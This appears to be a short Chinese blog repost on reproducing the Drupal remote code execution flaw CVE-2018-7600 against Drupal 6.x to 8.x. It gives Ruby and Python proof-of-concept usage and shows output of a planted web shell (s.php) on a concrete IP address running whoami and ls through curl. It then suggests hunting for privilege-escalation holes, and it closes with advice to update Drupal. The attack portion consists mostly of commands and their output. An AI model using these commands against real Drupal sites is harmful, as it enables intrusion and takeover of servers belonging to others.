标签:推荐 主机 col pytho pre blank python ruby cve
Drupal 6.x,7.x,8.x
在Python2.7 环境下运行poc即可验证
或者在Linux下安装ruby环境 并且运行 CVE-2018-7600.rb文件
ruby CVE-2017-7600.rb
ruby CVE-2018-7600.rb http://127.0.0.1:8089/drupal-8.5.0/ [*] Fake shell: curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=whoami‘
[*] Fake shell: curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=ls‘
最后可以查找系统漏洞进行提权
主要支持版本推荐更新到Drupal相应的最新子版本
参考 drupal官网
标签:推荐 主机 col pytho pre blank python ruby cve
原文地址:https://www.cnblogs.com/Rightsec/p/9027145.html